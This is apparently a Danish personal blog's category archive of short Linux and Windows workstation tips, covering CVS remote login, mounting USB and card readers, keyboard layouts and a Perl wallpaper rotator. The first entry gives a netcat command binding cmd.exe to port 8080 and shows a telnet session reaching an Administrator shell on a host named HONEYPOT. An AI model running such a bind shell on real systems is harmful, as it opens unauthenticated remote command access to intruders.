Kategoriarkiv: Workstation

Bind shell in windows

nc -L -d -e cmd.exe -p 8080 Will bind a cmd.exe to port 8080 root@camp:~# telnet 1.0.0.13 8080 Trying 1.0.0.13… Connected to 1.0.0.13. Escape character is ‘^]’. Microsoft Windows 2000 [version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\>whoami whoami HONEYPOT\Administrator … Læs resten

Udgivet i Knowledge Base, Networking, Old Base, Windows, Workstation | Skriv en kommentar

Remote CVS access

first check if the file ~/.cvspass exists and is readable else create it with: touch ~/.cvspass start the session by loggin in: cvs -d :pserser:user@server:$CVSROOT login where: pserver is the connection method. pserver is the most used user is your … Læs resten

Udgivet i FreeBSD, Knowledge Base, Linux, Windows, Workstation | Skriv en kommentar

BT’s Compact Flash Card Reader

modprobe epat modprobe pd mount /dev/pda1 /cfdisk  

Udgivet i Knowledge Base, Linux, Old Base, Uncategorized, Workstation | Skriv en kommentar

Dk/Uk Layout

The old xmodmap hack has been remove, this is mucho more neater. [submenu] (Keyboard Layout) [exec] (Danish) {setxkbmap dk} [exec] (English) {setxkbmap us} [end] No other files are needed, this is blackbox/fluxbox menu-style.

Udgivet i Knowledge Base, Linux, Old Base, Workstation | Skriv en kommentar

USB keyring under linux

modprobe usb-uchi modprobe usb-storage mount /dev/sda1 /mnt (driveren emulere scsi enhed, se i dmesg hvad enheden hedder)  

Udgivet i Knowledge Base, Linux, Old Base, Workstation | Skriv en kommentar

Kvael klokken i linux

X: xset b off console: setterm -blength  

Udgivet i Knowledge Base, Linux, Old Base, Uncategorized, Workstation | Skriv en kommentar

XF86Config med twinview og trippelskærm

den ligger på: http://blackthorne.dk/linux/?6=xf86&8=Workstation&10=linux

Udgivet i Knowledge Base, Linux, Old Base, Workstation | Skriv en kommentar

Automatisk baggrunds rotate

cycle.pl: #!/usr/bin/perl $path = “/usr/X11R6/share/bgrotate”; open FIL,”$path/current”; $current = <FIL>; close FIL; open FIL,”$path/cycle”; $dat = <FIL>; $first = $dat; while ($dat ne $current) { $dat = <FIL>; } unless ($next = <FIL>) {$next = $first;}; close(FIL); $res = system … Læs resten

Udgivet i Knowledge Base, Linux, Old Base, Workstation | Skriv en kommentar